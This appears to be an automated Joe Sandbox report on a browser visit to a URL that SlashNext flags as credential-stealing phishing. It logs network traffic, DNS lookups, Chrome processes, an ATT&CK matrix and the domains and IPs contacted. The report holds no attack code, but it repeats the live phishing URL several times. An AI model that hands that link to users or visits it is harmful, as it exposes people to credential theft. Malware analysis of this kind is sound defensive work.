Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /about/excellence/efqm-committed-2013.svg HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_img/2022/fonts/NotoSans-Regular.woff HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://www.iana.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.iana.org/_css/2022/iana_website.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /about/excellence/efqm-committed-2013.svg HTTP/1.1Host: www.iana.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /help/example-domains HTTP/1.1Host: www.iana.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /domains/idn-tables HTTP/1.1Host: www.iana.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /domains/arpa HTTP/1.1Host: www.iana.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: pti.icann.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: pti.icann.orgConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: pti.icann.orgConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /contact HTTP/1.1Host: www.iana.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /about/excellence HTTP/1.1Host: www.iana.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: or4t.iednationusa.com
Source: global trafficDNS traffic detected: DNS query: www.example.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.iana.org
Source: global trafficDNS traffic detected: DNS query: pti.icann.org
Source: global trafficDNS traffic detected: DNS query: www.efqm.org
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAge: 568202Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Thu, 10 Oct 2024 08:16:59 GMTExpires: Thu, 17 Oct 2024 08:16:59 GMTLast-Modified: Thu, 03 Oct 2024 18:26:58 GMTServer: ECAcc (nyd/D157)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Connection: close
Source: chromecache_59.2.dr, chromecache_64.2.drString found in binary or memory: https://www.iana.org/domains/example
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 23.60.203.209:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.60.203.209:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: classification engineClassification label: mal48.win@26/31@18/11
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1996,i,10250477170695779646,1042242611913617245,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://or4t.iednationusa.com/sYyRdjOU"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1996,i,10250477170695779646,1042242611913617245,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://or4t.iednationusa.com/sYyRdjOU0%VirustotalBrowse
https://or4t.iednationusa.com/sYyRdjOU100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
bg.microsoft.map.fastly.net0%VirustotalBrowse
s-part-0017.t-0009.t-msedge.net0%VirustotalBrowse
ianawww.vip.icann.org0%VirustotalBrowse
www.example.com0%VirustotalBrowse
efqm.org0%VirustotalBrowse
www.google.com0%VirustotalBrowse
s-part-0032.t-0009.t-msedge.net0%VirustotalBrowse
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
pti.icann.org0%VirustotalBrowse
www.iana.org0%VirustotalBrowse
www.efqm.org0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://www.iana.org/domains/example0%URL Reputationsafe
https://www.iana.org/_js/iana.js0%VirustotalBrowse
https://www.example.com/favicon.ico0%VirustotalBrowse
https://www.iana.org/_img/2022/iana-logo-header.svg0%VirustotalBrowse
https://www.iana.org/_img/bookmark_icon.ico0%VirustotalBrowse
http://pti.icann.org/0%VirustotalBrowse
https://www.iana.org/_css/2022/iana_website.css0%VirustotalBrowse
https://www.iana.org/_js/jquery.js0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalseunknown
pti.vip.icann.org
192.0.33.10
truefalse
    unknown
    or4t.iednationusa.com
    188.114.97.3
    truefalse
      unknown
      s-part-0017.t-0009.t-msedge.net
      13.107.246.45
      truefalseunknown
      www.google.com
      172.217.18.4
      truefalseunknown
      www.example.com
      93.184.215.14
      truefalseunknown
      ianawww.vip.icann.org
      192.0.46.8
      truefalseunknown
      fp2e7a.wpc.phicdn.net
      192.229.221.95
      truefalseunknown
      s-part-0032.t-0009.t-msedge.net
      13.107.246.60
      truefalseunknown
      efqm.org
      35.214.133.146
      truefalseunknown
      www.iana.org
      unknown
      unknownfalseunknown
      www.efqm.org
      unknown
      unknownfalseunknown
      pti.icann.org
      unknown
      unknownfalseunknown
      NameMaliciousAntivirus DetectionReputation
      https://www.iana.org/about/excellence/efqm-committed-2013.svgfalse
        unknown
        https://www.iana.org/_img/2022/fonts/SourceCodePro-Regular.wofffalse
          unknown
          https://www.example.com/favicon.icofalseunknown
          http://www.iana.org/help/example-domainsfalse
            unknown
            https://or4t.iednationusa.com/sYyRdjOUtrue
              unknown
              https://www.iana.org/_js/iana.jsfalseunknown
              https://www.iana.org/_img/2022/iana-logo-header.svgfalseunknown
              https://www.iana.org/_img/2022/fonts/NotoSans-Regular.wofffalse
                unknown
                http://www.iana.org/domains/arpafalse
                  unknown
                  https://www.iana.org/_img/bookmark_icon.icofalseunknown
                  https://www.example.com/false
                    unknown
                    https://www.iana.org/_css/2022/iana_website.cssfalseunknown
                    https://www.iana.org/domains/examplefalse
                    • URL Reputation: safe
                    unknown
                    http://www.iana.org/about/excellencefalse
                      unknown
                      https://www.iana.org/_js/jquery.jsfalseunknown
                      http://www.iana.org/domains/idn-tablesfalse
                        unknown
                        http://www.iana.org/contactfalse
                          unknown
                          http://pti.icann.org/falseunknown
                          https://www.iana.org/_img/2022/fonts/NotoSans-Bold.wofffalse
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            192.0.46.8
                            ianawww.vip.icann.orgUnited States
                            16876ICANN-DCUSfalse
                            192.0.33.8
                            unknownUnited States
                            40528ICANN-LAXUSfalse
                            172.217.18.4
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            192.0.33.10
                            pti.vip.icann.orgUnited States
                            40528ICANN-LAXUSfalse
                            239.255.255.250
                            unknownReserved
                            unknownunknownfalse
                            188.114.97.3
                            or4t.iednationusa.comEuropean Union
                            13335CLOUDFLARENETUSfalse
                            93.184.215.14
                            www.example.comEuropean Union
                            15133EDGECASTUSfalse
                            IP
                            192.168.2.16
                            192.168.2.4
                            192.168.2.6
                            192.168.2.13
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1530644
                            Start date and time:2024-10-10 10:15:53 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 59s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:browseurl.jbs
                            Sample URL:https://or4t.iednationusa.com/sYyRdjOU
